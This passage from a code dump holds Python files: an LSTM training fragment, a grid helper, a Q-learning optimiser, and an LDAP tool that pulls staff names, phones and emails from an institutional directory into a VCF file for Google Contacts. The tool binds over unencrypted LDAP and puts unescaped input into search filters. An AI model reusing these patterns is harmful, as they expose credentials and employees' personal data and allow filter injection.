enumerate(df.columns):\n if col == date_column:\n continue\n q[col] = q.__enum__.map(lambda num: X[num, :, i])\n q.drop('__enum__', inplace=True, axis=1)\n q.set_index(date_column, inplace=True)\n\n n = q.values\n # reshape the Matrix such that it matches the numpy shape\n x = np.zeros((n.shape[0], n.shape[1], look_back))\n\n for i in range(n.shape[0]):\n for j in range(n.shape[1]):\n x[i, j, :] = n[i, j]\n x[i, j, :] = n[i, j]\n utils.put_in_cache(x, key)\n return x\n\n\ndef main():\n df = pd.read_csv('test_data3.csv')\n backtest_settings = {\n 'backtest_method': 'walk_forward_rolling'\n\n }\n hide_columns = ['regression_target', 'Close', 'target', 'ret_1d']\n # tfc = train_tf_regressor1_model(df=df, date_column = 'Date', target='regression_target', backtest_settings=backtest_settings, hide_columns=hide_columns)\n tfc = train_lstm_regressor_model(df=df, date_column='Date', target='regression_target',\n backtest_settings=backtest_settings, hide_columns=hide_columns)\n return tfc\n\n\n# https://machinelearningmastery.com/regression-tutorial-keras-deep-learning-library-python/\n\nif __name__ == '__main__':\n tfc = main()\n # ml_visualizations.run_graphics(tfc)\n","sub_path":"fintf/tfmodel.py","file_name":"tfmodel.py","file_ext":"py","file_size_in_byte":8654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"559858424","text":"import os, sys\nimport argparse, logging, time\n\n\nimport ldap3\nfrom ldap3.core.exceptions import LDAPCursorError\n\n##############################################################\n# -\n##############################################################\ndef ParseInput():\n # =============================================\n # = Parsing\n # =============================================\n if len(sys.argv) == 1: sys.argv.append('-h')\n\n defaultFIELDS=['displayName', 'lastLogon', 'badPwdCount', 'badPasswordTime', 'company', 'postalCode', 'mobile', 'telephoneNumber', 'telefono']\n defaultMAX_ENTRIES=-1\n myParser = argparse.ArgumentParser(description='LnLdap_search is a command line tool used to query UTENZE.BANKIT.IT LDAP')\n\n userGroup = myParser.add_mutually_exclusive_group(required=True) # True indica obbligatorietà di uno del gruppo\n userGroup.add_argument('--userid',\n metavar='', required=False, default=None,\n help='[REQ] - Specify user ID [default=*]' )\n userGroup.add_argument('--username',\n metavar='', required=False, default=None,\n help='[REQ] - Specify user name')\n userGroup.add_argument('--phone',\n metavar='', required=False, default=None, type=int,\n help='[REQ] - Specify telephone number')\n\n myParser.add_argument('--max-entries', metavar='', type=int, help='[OPT] - Specify MAX entries to be processed ID (default={})'.format(defaultMAX_ENTRIES), required=False, default=defaultMAX_ENTRIES)\n myParser.add_argument('--fields', metavar='', required=False, default=defaultFIELDS, nargs='*', help='print specific field data (default: {})'.format(defaultFIELDS))\n myParser.add_argument('--vcf', action='store_true', help='create a VCF with phone data... 
for google contacts import')\n myParser.add_argument('--console', action='store_true', help='[OPT] - Specifies if console-log is desired')\n\n args = vars(myParser.parse_args())\n if args['phone']:\n args['fields'] = ['displayName', 'mobile', 'telephoneNumber']\n\n\n print()\n for key, val in args.items():\n print (' {:<25}: {}'.format(key, val))\n print()\n\n # sys.exit()\n return args\n\n\n\n##############################################################\n# -\n##############################################################\ndef InitLogger(CONSOLE=False):\n # =============================================\n # = Logging\n # =============================================\n LOG_DIR = 'd:/temp/log'\n LOG_FILE_NAME = 'ldap3_' + time.strftime('%Y-%m-%d_%H-%M-%S') + '.log'\n LOG_FILE_NAME = 'ldap3_' + time.strftime('%Y-%m-%d') + '.log'\n\n # set up Logger\n logFormatter = logging.Formatter(\"%(asctime)s [%(levelname)-5.5s] %(message)s\", datefmt='%Y-%m-%d %H:%M:%S')\n logFormatter = logging.Formatter(\"%(asctime)s [%(levelname)-5.5s] %(message)s\", datefmt='%H:%M:%S')\n logFormatter = logging.Formatter('[%(module)-20s:%(lineno)4d] %(levelname)-5.5s - %(message)s')\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n\n # log to the console\n if CONSOLE:\n consoleHandler = logging.StreamHandler()\n consoleHandler.setFormatter(logFormatter)\n logger.addHandler(consoleHandler)\n\n # also log to a file\n if not os.path.exists(LOG_DIR):\n logger.info(\"Creating log directory: {}\".format(LOG_DIR))\n os.makedirs(LOG_DIR)\n\n logFileName = '{0}/{1}'.format(LOG_DIR, LOG_FILE_NAME)\n print ('using logFile:', logFileName)\n\n fileHandler = logging.FileHandler(logFileName)\n fileHandler.setFormatter(logFormatter)\n logger.addHandler(fileHandler)\n\n return logger\n\n\n\n\n##############################################################\n# - data deve essere una LIST\n##############################################################\ndef WriteTextFile(outFname, data=[], encoding='utf-8'):\n nLines = 0\n newline = '\\n'\n f = open(outFname, \"w\", encoding=encoding)\n for line in data:\n f.write('{0}{1}'.format(line, newline))\n nLines += 1\n\n f.close()\n\n return nLines\n\n\n\n##############################################################\n# -\n##############################################################\ndef login(user_name='xxxx', bindPsw='xxxx', USE_NTLM=True):\n\n LDAP_SERVER = \"utenze.bankit.it\"\n\n # define the server\n ldapServer = ldap3.Server(LDAP_SERVER, port=389, use_ssl=False, get_info=ldap3.ALL) # define an unsecure LDAP server,\n\n\n # define the connection\n if USE_NTLM:\n domain_name = \"utenze.bankit.it\"\n conn = ldap3.Connection(ldapServer, user='{}\\\\{}'.format(domain_name, user_name), password=bindPsw, authentication=ldap3.NTLM, auto_bind=True)\n else:\n bindUser = \"CN={USERNAME},OU=Utenti_7,OU=SVI,OU=RisorseUtente,DC=utenze,DC=BANKIT,DC=IT\".format(USERNAME=user_name)\n conn = ldap3.Connection(ldapServer, user=bindUser, password=bindPsw)\n\n # perform the Bind operation\n if not conn.bind():\n print('error in bind', conn.result)\n sys.exit()\n\n return conn\n\n\n###########################################################\n#\n###########################################################\ndef createVcfCard(userDict, fDEBUG=False):\n\n print ('preparing VCF for user: {} - {}'.format(userDict['nickName'], userDict['dispName']))\n\n if fDEBUG:\n for key, val in userDict.items():\n print (' {:<25}: {}'.format(key, val))\n\n VCF = []\n VCF.append('BEGIN:VCARD')\n 
VCF.append('VERSION:3.0')\n # VCF.append('FN:{NAME} - (BdI)'.format(NAME=userDict['displayName']))\n VCF.append('FN:{NAME}'.format(NAME=userDict['dispName']))\n VCF.append('N:{LAST};{FIRST};;;'.format(FIRST=userDict['firtName'], LAST=userDict['lastName']))\n\n VCF.append('EMAIL;TYPE=INTERNET;TYPE=WORK:{MAIL}'.format(MAIL=str(userDict['mail']).lower()))\n\n if 'telefoni' in userDict:\n for tel in userDict['telefoni']:\n telTYPE = 'CELL' if tel.startswith('+393') else 'WORK'\n VCF.append('TEL;TYPE={TYPE}:{TEL}'.format(TYPE=telTYPE, TEL=tel))\n\n if 'nickName' in userDict: VCF.append('NICKNAME:{NICK}'.format(NICK=userDict['nickName']))\n if 'note' in userDict: VCF.append('NOTE:{NOTE}'.format(NOTE=userDict['note']))\n if 'organization' in userDict: VCF.append('ORG:{SOCIETA}'.format(SOCIETA=userDict['organization']))\n if 'titolo' in userDict: VCF.append('TITLE:{TITOLO}'.format(TITOLO=userDict['titolo']))\n\n\n\n VCF.append('END:VCARD')\n if fDEBUG:\n print()\n for line in VCF:\n print (' {:<25}'.format(line))\n\n\n return VCF\n\n\n\n\n###########################################################\n# list_generator\n###########################################################\ndef list_with_generator(conn, searchFilter=None, searchBase=None, attributes=None, MAX_ENTRIES=-1, fDEBUG=False):\n '''\n Response\n Responses are received and stored in the connection.response as a list of dictionaries. You can get the search result entries of a Search operation iterating over the response attribute. Each entry is a dictionary with the following field:\n dn: the distinguished name of the entry\n attributes: a dictionary of returned attributes and their values. Values are list. Values are in UTF-8 format\n raw_attributes: same as ‘attributes’ but not encoded (bytearray)\n '''\n\n\n if not searchBase: searchBase = \"OU=RisorseUtente,dc=utenze,dc=bankit,dc=it\"\n if not attributes: attributes = [ldap3.ALL_ATTRIBUTES, ldap3.ALL_OPERATIONAL_ATTRIBUTES]\n if not searchFilter: searchFilter = '(objectclass=person)'\n\n # paged search wrapped in a generator and return dictionary datatype\n\n entry_generator = conn.extend.standard.paged_search(search_base = searchBase,\n search_filter = searchFilter,\n search_scope = ldap3.SUBTREE,\n attributes = attributes,\n paged_size = 5,\n generator = True)\n\n counter = 0\n myENTRIES = []\n\n # ogni entry è un dictionary\n fDEBUG = False\n STEP = 100\n for entry in entry_generator:\n DN = entry['dn']\n if fDEBUG:\n print(type(entry), type(DN), DN)\n\n counter += 1\n if not counter%STEP:\n print ('[{:5}] - processing DN: {}'.format(counter, DN))\n\n myENTRIES.append(entry)\n\n if counter == MAX_ENTRIES:\n break\n\n print('Total entries retrieved:', counter)\n return myENTRIES\n\n\n\n###########################################################\n#\n###########################################################\ndef getPhoneNumbers_OLD(conn, MAX_ENTRIES=-1, fDEBUG=False):\n searchBase = \"OU=RisorseUtente,dc=utenze,dc=bankit,dc=it\"\n attributes = [ldap3.ALL_ATTRIBUTES, ldap3.ALL_OPERATIONAL_ATTRIBUTES]\n\n ''' # potrebbe dare errore se l'attributo non esiste\n attributes = [ 'distinguishedName',\n 'sAMAccountName',\n 'displayName',\n 'company',\n 'otherTelephone',\n 'telefono',\n 'postalCode'\n ]\n '''\n searchFilter = '(objectclass=person)'\n\n\n myLIST = list_with_generator(conn, searchFilter=searchFilter, searchBase=searchBase, attributes=attributes, MAX_ENTRIES=MAX_ENTRIES)\n\n\n myValidREC = []\n nEntry = 0\n for entry in myLIST:\n\n DN = entry['dn']\n attr = entry['attributes']\n 
raw_attr = entry['raw_attributes']\n\n        nEntry += 1\n        logger.info('[{:05}] - DN = {}'.format(nEntry, DN))\n        rec = entryValidation(entry)\n        if not rec == {} and not rec['telefoni'] == []:\n            myValidREC.append(rec)\n\n    return myValidREC\n\n\n\n##############################################################\n# -\n##############################################################\ndef getUserEntry(conn, userID='*', userName=None, phone=None, MAX_ENTRIES=-1):\n\n    searchBase = \"OU=RisorseUtente,dc=utenze,dc=bankit,dc=it\"\n    attributes = [ldap3.ALL_ATTRIBUTES, ldap3.ALL_OPERATIONAL_ATTRIBUTES]\n\n    if userName:\n\n        # does not work well....\n        searchFilter = '''(&\n                            (objectClass=person)\n                            (|\n                                (displayName=*{NAME})\n                                (displayName={NAME}*)\n                            )\n                        )'''.format(NAME=userName)\n\n        # seems OK....\n        searchFilter = '''(&\n                            (objectclass=person)\n                            (displayName=*{NAME}*)\n                        )'''.format(NAME=userName)\n\n    elif userID == 'all':\n        searchFilter = '(objectclass=person)'\n\n    elif phone:\n        searchFilter = '''(&\n                            (objectClass=person)\n                            (|\n                                (telephoneNumber=*{PHONE}*)\n                                (mobile=*{PHONE}*)\n                            )\n                        )'''.format(PHONE=phone)\n\n        # (telefono=*{PHONE}*)\n    else:\n        searchFilter = '(&(objectclass=person)(cn={CN}))'.format(CN=userID)\n\n\n    myLIST = list_with_generator(conn, searchFilter=searchFilter, searchBase=searchBase, attributes=attributes, MAX_ENTRIES=MAX_ENTRIES)\n    # found = conn.search(baseSearch, search_scope=ldap3.SUBTREE, search_filter=criteria, attributes=attributes)\n\n\n    myValidREC = []\n    nEntry = 0\n    for entry in myLIST:\n        DN = entry['dn']\n        attr = entry['attributes']\n        raw_attr = entry['raw_attributes']\n\n        nEntry += 1\n\n        logger.info('[{:05}] - DN = {}'.format(nEntry, DN))\n        # check the fields needed to identify a user\n        isValid = entryValidation(entry, attributes=['displayName', 'sAMAccountName'])\n        if isValid:\n            myValidREC.append(entry)\n\n    return myValidREC\n\n\n\n############################################################\n#\n############################################################\ndef entryValidation(entry, attributes=[], fDEBUG=False):\n    assert type(entry) == dict\n    if attributes == []:\n        attributes = ['displayName', 'sAMAccountName']\n\n    eAttr = entry['attributes']\n\n    if fDEBUG:\n        print()\n        for key, val in eAttr.items():\n            print ('{:<25} : {}'.format(key, val))\n\n    try:\n        for attr in attributes:\n            value = eAttr[attr]\n\n    except (Exception) as why:\n        logger.info('       skipping... due to a missing attribute: {}'.format(str(why)))\n        return False\n\n    if 'computer' in eAttr['objectClass']:\n        logger.info('       skipping... due to computer class')\n        return False\n\n    elif 'person' not in eAttr['objectClass']:\n        logger.info('       skipping... not person class')\n        return False\n\n    return True\n\n\n############################################################\n#\n############################################################\ndef getPhoneNumbers(entry, fDEBUG=False):\n    assert type(entry) == dict\n\n    DN = entry['dn']\n    eAttr = entry['attributes']\n\n    if fDEBUG:\n        print()\n        for key, val in eAttr.items():\n            print ('{:<25} : {}'.format(key, val))\n\n    myRec = {} # return Record\n\n\n    isValid = entryValidation(entry, attributes=['displayName', 'sAMAccountName', 'mail'])\n    if isValid == False:\n        return myRec\n\n    if 'company' in eAttr and eAttr['company'] == 'PERSONALE ESTERNO':\n        logger.info('       skipping... 
external user')\n        return myRec\n\n    # ---------- Record is validated\n\n    dispName = eAttr['displayName']\n    sAMA = eAttr['sAMAccountName']\n    mail = eAttr['mail']\n\n    if ' - ' in dispName:\n        dispName, notes = dispName.split(' - ', 1)\n    else:\n        notes = ''\n\n    logger.info('    displayName    : {}'.format(dispName))\n    logger.info('    sAMAccountName : {}'.format(sAMA))\n\n    nameTokens = dispName.split()\n\n    if len(nameTokens) == 2:\n        firtsName, lastName = dispName.split()\n\n    elif len(nameTokens) == 3:\n        firtsName, middleName, lastName = dispName.split()\n\n        if middleName.lower() in ['di', 'delle', 'della', 'degli', 'de']:\n            lastName = '{} {}'.format(middleName, lastName)\n\n        elif middleName.lower() in ['d']:\n            lastName = \"d'{}\".format(lastName)\n            dispName = dispName.replace(' ' + middleName + ' ', ' ' + middleName + \"'\")\n\n        else:\n            firtsName = '{} {}'.format(firtsName, middleName)\n\n    elif len(nameTokens) > 3:\n        firtsName, middleName, lastName = dispName.rsplit(' ', 2)\n        lastName = '{} {}'.format(middleName, lastName)\n\n\n    else:\n        firtsName = dispName\n        lastName = ''\n\n\n    if fDEBUG: print ('processing DN:', DN)\n\n    # - look up the telephone numbers\n    telephoneAttributes = ['telephoneNumber', 'telefono', 'otherTelephone', 'mobile']\n    telefoni = []\n    for attrName in telephoneAttributes:\n        if not attrName in eAttr: continue\n        _tel = eAttr[attrName]\n        if isinstance(_tel, str):\n            _tel = [_tel]\n\n        for oTel in _tel:\n            if oTel.startswith('2'):\n                intenalTel = '+39064792' + oTel[1:]\n                if intenalTel in telefoni:\n                    telefoni.remove(intenalTel)\n                    telefoni.append('+39 06 4792 ' + oTel[1:])\n                telefoni.append('+39 06 9468 ' + oTel ) # the outgoing number keeps the leading 2\n\n            else:\n                telefoni.append(oTel ) # the outgoing number keeps the leading 2\n\n\n    if telefoni == []:\n        return {}\n\n    myRec['DN'] = DN\n    myRec['firtName'] = firtsName\n    myRec['lastName'] = lastName\n    myRec['nickName'] = sAMA\n    myRec['telefoni'] = telefoni\n    myRec['dispName'] = dispName\n    myRec['organization'] = 'BdI'\n\n    # contains the user's rank\n\n    if 'postalCode' in eAttr:\n        # myRec['note'] += 'grado\\\\: {}'.format(eAttr['postalCode'].title()) # camel Case\n        myRec['titolo'] = eAttr['postalCode'].title()\n\n\n    if notes:\n        myRec['note'] = ' - {}'.format(notes)\n\n    # voci = ['telefono', 'telefono01', 'telefono02', 'displayName', 'mail']\n    voci = ['mail']\n    for voce in voci:\n        if voce in eAttr: myRec[voce] = eAttr[voce]\n\n    if fDEBUG:\n        for key, val in myRec.items():\n            print ('  {:<25}: {}'.format(key, val))\n\n    return myRec\n\n\n\n\nif __name__ == '__main__':\n    # variables defined here are automatically global.\n    inpArgs = ParseInput()\n    logger = InitLogger(CONSOLE=inpArgs['console'])\n    if not inpArgs['userid']: userID = os.getlogin()\n\n    conn = login(user_name=\"xxxx\", bindPsw=\"yyyy\", USE_NTLM=True)\n\n    entryLIST = getUserEntry(conn, userID=inpArgs['userid'], phone=inpArgs['phone'], userName=inpArgs['username'], MAX_ENTRIES=inpArgs['max_entries'])\n    conn.unbind()\n\n    nUser = 0\n\n    # create a VCF file to import into Gmail contacts\n    if inpArgs['vcf']:\n        myVcfList = []\n        print()\n        for entry in entryLIST:\n            rec = getPhoneNumbers(entry)\n            if rec:\n                vcf = createVcfCard(rec)\n                myVcfList.extend(vcf)\n                myVcfList.append('')\n                nUser += 1\n\n        outFile = 'd:\\\\temp\\\\google-bdi.vcf'\n        nLines = WriteTextFile(outFname=outFile, data=myVcfList, encoding='utf-8')\n        print ('''total processed Users: {}\n             {} lines have been written to file: {}'''.format(nUser, nLines, outFile))\n\n    # display selected fields\n    elif 
inpArgs['fields']:\n        for entry in entryLIST:\n            DN = entry['dn']\n            attr = entry['attributes']\n            raw_attr = entry['raw_attributes']\n            print ()\n            # print (DN)\n\n            print('    {:<25}: {} - {}'.format(attr['displayName'], attr['sAMAccountName'], DN))\n\n            reqFields = [item.lower() for item in inpArgs['fields'] ]\n            for attrName in attr.keys():\n                if attrName.lower() in reqFields:\n                    val = attr[attrName]\n                    if isinstance(val, list):\n                        print ('    {:<25}:'.format(attrName))\n                        for item in val:\n                            print (' '*30, item)\n\n                    else:\n                        print ('    {:<25}: {}'.format(attrName, attr[attrName]))\n\n\n\n","sub_path":"Ldap3/LnLdapSearch.py","file_name":"LnLdapSearch.py","file_ext":"py","file_size_in_byte":18883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
{"seq_id":"554941925","text":"import exception\n\n\nclass GridManagement:\n\n    \"\"\"\n    GridManagement manages the position of elements.\n    It is used to return a pixel position from a grid position.\n    By default, a cell size is 200x100 px\n    \"\"\"\n\n    X_SIZE = 200\n    Y_SIZE = 100\n\n    VERTICAL_TOP_ALIGN = 0\n    HORIZONTAL_LEFT_ALIGN = 0\n\n    \"\"\"\n    Static method which converts a grid position (x, y) to a pixel position.\n    Use GridManagement.X_SIZE and GridManagement.Y_SIZE to determine the default\n    cell size. 
You can also manage the vertical and horizontal alignment.\n    Possible vertical alignment values are \"top\", \"middle\", \"bottom\".\n    Possible horizontal alignment values are \"left\", \"middle\", \"right\".\n\n    Args:\n        element - a dictionary that must contain the keys:\n            x -- The horizontal position in a grid\n            y -- The vertical position in a grid\n            vertical-align -- The vertical position in a cell\n            horizontal-align -- The horizontal position in a cell\n            vertical-middle -- integer value\n            vertical-top -- integer value\n            horizontal-middle -- integer value\n            horizontal-right -- integer value\n    Raises:\n        NotIntegerValueException -- when one value is not an integer\n    \"\"\"\n    @staticmethod\n    def getPosition(element):\n        x = element['x']\n        y = element['y']\n        verticalAlignement = element['vertical-align']\n        horizontalAlignement = element['horizontal-align']\n\n        # Default alignment is top, left\n        verticalAlign = GridManagement.VERTICAL_TOP_ALIGN\n        horizontalAlign = GridManagement.HORIZONTAL_LEFT_ALIGN\n\n        if verticalAlignement == \"middle\":\n            verticalAlign = element['vertical-middle']\n        if verticalAlignement == \"bottom\":\n            verticalAlign = element['vertical-bottom']\n\n        if horizontalAlignement == \"middle\":\n            horizontalAlign = element['horizontal-middle']\n        if horizontalAlignement == \"right\":\n            horizontalAlign = element['horizontal-right']\n\n        try:\n            x = int(x)\n            y = int(y)\n            horizontalAlign = int(horizontalAlign)\n            verticalAlign = int(verticalAlign)\n            xCenter = int(element[\"xCenter\"])\n            yCenter = int(element[\"yCenter\"])\n        except Exception as e:\n            raise exception.NotIntegerValueException(e)\n\n        element['x'] = x*GridManagement.X_SIZE+horizontalAlign\n        element['y'] = y*GridManagement.Y_SIZE+verticalAlign\n        # The element center moves with its position\n        element['xCenter'] = element['x']+xCenter\n        element['yCenter'] = element['y']+yCenter\n        return element\n\n    @staticmethod\n    def getDimension(maxsize):\n        size = {}\n        size['x'] = (maxsize['x']+1)*GridManagement.X_SIZE\n        size['y'] = (maxsize['y']+1)*GridManagement.Y_SIZE\n        return size\n","sub_path":"bin/gridManagement.py","file_name":"gridManagement.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
{"seq_id":"486779239","text":"# coding:utf-8\n# 2019-12-10\n# Reinforcement-learning-based optimization\nimport sys\nsys.path.append(\"../\")\n\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\nimport datetime\nimport logging\nimport numpy as np\nimport pickle\n\nimport model\nfrom util import io, tool\nfrom quadRegresstion import *\n\n# Logging setup\nLOGGER_PATH = \"../log\"\nlogger = tool.getLogger(LOGGER_PATH)\nlogger.setLevel(logging.DEBUG)\n\n# Model path format\nmodelPathFormat = r\"C:\\Study\\github\\Lookoops\\tool\\毕设代码\\data/{}.model\"\nsingleModelPathFormat = r\"C:\\Study\\github\\Lookoops\\tool\\毕设代码\\data/singleModel/{}.model\"\nQSavingPath = r\"C:\\Study\\github\\Lookoops\\tool\\毕设代码\\data\\Q.model\"\n\nstartTime = datetime.datetime.now() \n\ndef getModelName():\n    \"\"\"Return the names of the selected best models\"\"\"\n    names = [\"quadraticRegression\", \"stackingModel\"]\n\n    return names\n\ndef getSingleModel():\n    \"\"\"Return the names of the individual models\"\"\"\n    names, models = model.getModel()\n\n    return names\n\nclass Env(object):\n    \"\"\"Framework for searching for the minimum value\"\"\"\n    def __init__(self, agent, dim, lowBoundary, upBoundary, \n                initPost=None, checkLens=500, lmb=0.01):\n        \"\"\"Initialization\n        @param agent surrogate model exposing a predict(X) interface\n        @param int dim number of variables\n        @param [] lowBoundary variable lower bounds\n        @param [] upBoundary variable upper bounds\n        @param [,None] initPost initial position; defaults to the midpoint\n        @param int checkLens 
\nclass Env(object):\n    \"\"\"Minimum-value search environment\"\"\"\n    def __init__(self, agent, dim, lowBoundary, upBoundary, \n                initPost=None, checkLens=500, lmb=0.01):\n        \"\"\"Initialise the environment\n        @param agent surrogate model exposing a predict(X) interface\n        @param int dim number of variables\n        @param [] lowBoundary lower bounds of the variables\n        @param [] upBoundary upper bounds of the variables\n        @param [,None] initPost initial position, defaults to the midpoint\n        @param int checkLens window length used to decide termination\n        @param float lmb reward weight\n        \"\"\"\n        self.agent = agent\n        self.optimalValue = None\n        self.dim = dim\n        self.lowBoundary = lowBoundary\n        self.upBoundary = upBoundary\n        self.curPosition = self.initPosition(initPost) # current position\n        self.checkLens = checkLens # window length for the termination check\n        self.lmb = lmb # reward weight\n        self.computeStore = [None] # history of evaluated values\n        self.optimalStore = [None] # history of best values\n        self.isEnd = False # termination flag\n        self.step = 0 # step counter\n        self.candidate = self.initCan(dim, lowBoundary, upBoundary)\n\n    def initPosition(self, initPost):\n        \"\"\"Initialise the start position; defaults to the middle of the grid\"\"\"\n        if initPost is not None:\n            return initPost\n        posSplit = 0.5\n        pos = []\n        for i in range(self.dim):\n            scope = self.upBoundary[i] - self.lowBoundary[i]\n            pos.append(int(scope * posSplit))\n\n        return pos \n\n    def initCan(self, dim, lowBoundary, upBoundary):\n        \"\"\"Build the candidate values for each dimension\"\"\"\n        candidate = []\n        for i in range(dim):\n            tmpCandidate = [i for i in range(lowBoundary[i], upBoundary[i])]\n            candidate.append(tmpCandidate)\n\n        return candidate\n\n    def interact(self, action):\n        \"\"\"Apply the given action and return the reward\"\"\"\n        assert self.isEnd == False\n\n        reward = 0\n\n        # update the current position and read its candidate value\n        if not self.checkBoundary(action): # boundary check\n            return reward\n        for i in range(len(action)):\n            self.curPosition[i] += action[i]\n        value = self.getCurCandidateValue()\n\n        # evaluate the candidate with the surrogate model\n        computeValue = self.agent.predict([value])\n        self.computeStore.append(computeValue)\n\n        # update the best value and compute the reward\n        if not self.optimalValue:\n            self.optimalValue = computeValue\n        else:\n            reward = self.rewardJudge(computeValue)\n            if computeValue < self.optimalValue:\n                self.optimalValue = computeValue\n\n        self.step += 1\n        self.optimalStore.append(self.optimalValue)\n        self.checkOptimalValueIsConvergence() # stop once the best value stops improving\n\n        return reward\n\n    def checkBoundary(self, action):\n        \"\"\"Check that the action keeps the position inside the bounds\"\"\"\n        ret = True\n        for i in range(self.dim):\n            if self.curPosition[i]+action[i] >= len(self.candidate[i]) or self.curPosition[i]+action[i] < 0:\n                ret = False\n                break\n\n        return ret\n\n    def getCurCandidateValue(self):\n        \"\"\"Candidate value at the current position\"\"\"\n        value = []\n        for i in range(self.dim):\n            value.append(self.candidate[i][self.curPosition[i]])\n\n        return value\n\n    def rewardJudge(self, computeValue):\n        \"\"\"Compute the reward\"\"\"\n        reward = (self.optimalValue - computeValue) * self.lmb # the bigger the improvement, the bigger the reward\n\n        return reward\n\n    def checkOptimalValueIsConvergence(self):\n        \"\"\"Stop iterating if the best value has not changed over the last checkLens steps\"\"\"\n        curOptimalStoreLens = len(self.optimalStore)\n        if curOptimalStoreLens < self.checkLens:\n            return None\n\n        lastValue = self.optimalStore[curOptimalStoreLens-self.checkLens:]\n        if lastValue == lastValue[::-1]:\n            self.isEnd = True\n            logger.debug(\"iteration: {}, find cur iteration optimal value, stop cur iteration\".format(self.step))\n\n    @property\n    def presentState(self):\n        \"\"\"Current position\"\"\"\n        return self.curPosition\n\n    def printOptimalValue(self):\n        \"\"\"Log the best value found so far\"\"\"\n        logger.info(\"step: {}, cur optimal var: {}, optimal value: {}\"\\\n            .format(self.step, self.getCurCandidateValue(), self.optimalValue))\n\n    def getOptimalValue(self):\n        \"\"\"Best variable values and best objective value\"\"\"\n        return self.getCurCandidateValue(), self.optimalValue\n    
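# Minimal interaction sketch for Env (illustrative only; the bounds and the\n# fixed action below are made-up values):\n#   env = Env(agent, dim=2, lowBoundary=[0, 0], upBoundary=[10, 10])\n#   while not env.isEnd and env.step < 1000:\n#       reward = env.interact([1, 0])   # move one cell along the first axis\n#   print(env.getOptimalValue())\n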
\nclass QClass(object):\n    \"\"\"Q-value table\"\"\"\n    def __init__(self, dim, actionDim, lowBoundary, upBoundary):\n        self.alpha = 0.1\n        self.gamma = 0.9\n\n        self.dim = dim # number of variables\n        self.actionDim = actionDim\n        self.q = [[] for i in range(dim)]\n        for i in range(dim):\n            self.q[i] = np.zeros((abs(upBoundary[i]- lowBoundary[i]), actionDim))\n\n\n    def updateStateAndAction(self, state, action, newState, newAction, reward):\n        \"\"\"SARSA update of the Q-values: Q(s,a) <- (1-alpha)*Q(s,a) + alpha*(r + gamma*Q(s',a'))\"\"\"\n        for i in range(self.dim):\n            self.q[i][state[i], action[i]] = (1 - self.alpha) * self.q[i][state[i], action[i]] \\\n                + self.alpha * (reward + self.gamma * self.q[i][newState[i], newAction[i]])\n\n    def getCurOptAction(self, state):\n        \"\"\"Greedy action with respect to the current Q-values\"\"\"\n        action = []\n        for i in range(self.dim):\n            curAction = (self.q[i][state[i], :]).argmax()\n            action.append(curAction)\n\n        return np.array(action)\n\n\ndef epsilonGreedy(Q, state):\n    \"\"\"Epsilon-greedy policy: pick the next action for the given state\"\"\"\n    if (np.random.uniform() > 1 - EPSILON) or ((Q.getCurOptAction(state) == 0).all()):\n        action = [np.random.randint(-1, 2) for i in range(Q.dim)]\n    else:\n        action = Q.getCurOptAction(state)\n\n    return action\n
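# The policy above is epsilon-greedy: with probability EPSILON (or while the\n# Q-row is still all zeros) it explores with a random move in {-1, 0, 1} per\n# dimension; otherwise it exploits argmax_a Q(s, a). Worked update example\n# with alpha=0.1, gamma=0.9, Q(s,a)=0.5, r=1, Q(s',a')=0.2:\n#   0.9*0.5 + 0.1*(1 + 0.9*0.2) = 0.45 + 0.118 = 0.568\n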
\ndef generatePoints(lowBoundary, upBoundary, splitPointCount):\n    \"\"\"Generate starting points spread over different regions\"\"\"\n    if splitPointCount == 0:\n        return [None]\n    dim = len(lowBoundary)\n    pos = None\n    gap = []\n    for i in range(dim):\n        gap.append(upBoundary[i] - lowBoundary[i])\n    splitPoint = []\n    for i in range(dim):\n        increate = int(gap[i] // (splitPointCount + 1))\n        tmpSplitPoint = []\n        for j in range(splitPointCount):\n            tmpSplitPoint.append(increate * (j + 1))\n        splitPoint.append(tmpSplitPoint)\n    # print(\"[DEBUG] splitPoint : {}\".format(splitPoint))\n    pos = crossPoint(splitPoint)\n\n    return pos \n\ndef crossPoint(points):\n    \"\"\"Cartesian product of the per-dimension split points\"\"\"\n    def helper(points, res):\n        if not points:\n            return res\n        ret = []\n        for i in res:\n            for j in points[0]:\n                ret.append(i + [j])\n\n        return helper(points[1:], ret)\n\n    res = [[v] for v in points[0]]\n\n    return helper(points[1:], res)\n\n\n# Global parameters\nEPSILON = 0.1\nMAX_STEP = 100000 # maximum number of steps per episode\n\ndef main():\n    \"\"\"Single-objective, multi-constraint optimisation\"\"\"\n    dim = 5 # number of variables\n    actionDim = 3 # action dimension\n    lowBoundary = [-300, -300, -300, -300, -200] # lower bounds\n    upBoundary = [300, 300, 100, 300, 200] # upper bounds\n\n    # load the surrogate model\n    modelName = getModelName()[1]\n    modelPath = modelPathFormat.format(modelName) # stackingModel\n    agent = io.getData(modelPath) \n\n    maxIter = 50 # number of episodes\n    checkLens = 10000 # termination window\n    lmb = 0.1\n\n    # initialise the starting points\n    splitPointCount = 3\n    initPos = generatePoints(lowBoundary, upBoundary, splitPointCount) \n\n    logger.info(\"using model: {}\".format(modelName))\n    logger.info(\"dim: {}, actionDim: {}, lowBoundary: {}, upBoundary: {}, maxIter: {}, checkLens: {}, lmb: {}, splitPointCount: {}, pointsSize: {}, EPSILON: {}, MAX_STEP: {}\"\\\n        .format(dim, actionDim, lowBoundary, upBoundary, maxIter, checkLens,\n            lmb, splitPointCount, len(initPos), EPSILON, MAX_STEP))\n\n    # training\n    Q = QClass(dim, actionDim, lowBoundary, upBoundary)\n    globalBestValue = []\n    for pos in initPos:\n        logger.info(\"using initial position: {}\".format(pos))\n        bestValue = []\n        for it in range(maxIter):\n            # logger.info(\"iter: {}\".format(it))\n            e = Env(agent, dim, lowBoundary, upBoundary, initPost=pos, checkLens=checkLens, lmb=lmb)\n            action = epsilonGreedy(Q, e.presentState)\n            while (e.isEnd is False) and (e.step < MAX_STEP):\n                # logger.info(\"e.step: {}\".format(e.step))\n                state = e.presentState\n                reward = e.interact(action) # reward for the current action\n                newState = e.presentState # resulting state\n                newAction = epsilonGreedy(Q, newState) # next action from the accumulated 